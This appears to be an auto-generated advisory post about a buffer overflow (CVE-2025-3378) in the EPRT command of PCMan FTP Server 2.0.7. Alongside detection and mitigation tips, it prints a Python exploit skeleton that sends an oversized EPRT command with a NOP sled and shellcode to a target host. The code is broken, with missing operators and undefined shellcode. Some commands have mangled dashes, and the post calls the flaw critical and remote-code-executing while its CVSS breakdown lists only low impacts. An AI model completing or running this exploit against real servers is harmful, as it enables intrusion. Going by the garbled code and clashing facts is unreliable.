PCMan FTP Server, Buffer Overflow, CVE-2025-3378 (Critical)

Listen to this Post

How CVE-2025-3378 Works

The vulnerability exists in the EPRT command handler of PCMan FTP Server 2.0.7. When processing overly long EPRT command arguments, the server fails to perform proper bounds checking, leading to a stack-based buffer overflow. Attackers can exploit this by sending a maliciously crafted EPRT command containing excessive data, overwriting critical memory structures. This allows remote code execution with server-level privileges due to insufficient input validation. The exploit leverages FTP protocol compliance to bypass network-level protections.

DailyCVE Form:

Platform: PCMan FTP
Version: 2.0.7
Vulnerability: Buffer Overflow
Severity: Critical
Date: 04/23/2025

What Undercode Say:

Exploitation:

import socket
target = "192.168.1.100"
port = 21
payload = b"EPRT " + b"A" 1024 + b"\x90" 50 + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(payload + b"\r\n")

Protection:

1. Apply vendor patch immediately.

2. Block EPRT commands at network perimeter:

“`iptables -A INPUT -p tcp –dport 21 -m string –string “EPRT” –algo bm -j DROP“`

3. Enable DEP/ASLR on host system.

Detection:

grep -r "EPRT" /var/log/ftp.log | wc -l

Forensics:

1. Check for abnormal child processes of `pcmanftpd.exe`.

2. Monitor for unexpected shell spawns:

“`ps aux | grep -E ‘sh|bash|cmd’“`

Mitigation:

  • Disable EPRT support in server config.
  • Restrict FTP access via VPN.
  • Network segmentation for FTP servers.

CVSS Breakdown:

  • Attack Vector: Network (AV:N)
  • Complexity: Low (AC:L)
  • Privileges: None (PR:N)
  • Impact: Triple (VC:L/VI:L/VA:L)

References:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top